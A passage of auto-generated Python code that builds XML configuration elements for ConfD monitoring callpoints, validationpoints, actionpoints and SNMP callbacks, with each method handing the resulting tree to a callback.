file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(callpoint, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id = ET.SubElement(validationpoint, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(validationpoint, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id = ET.SubElement(actionpoint, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(actionpoint, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id = ET.SubElement(snmp_inform_callback, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(snmp_inform_callback, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id = ET.SubElement(snmp_notification_subscription, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
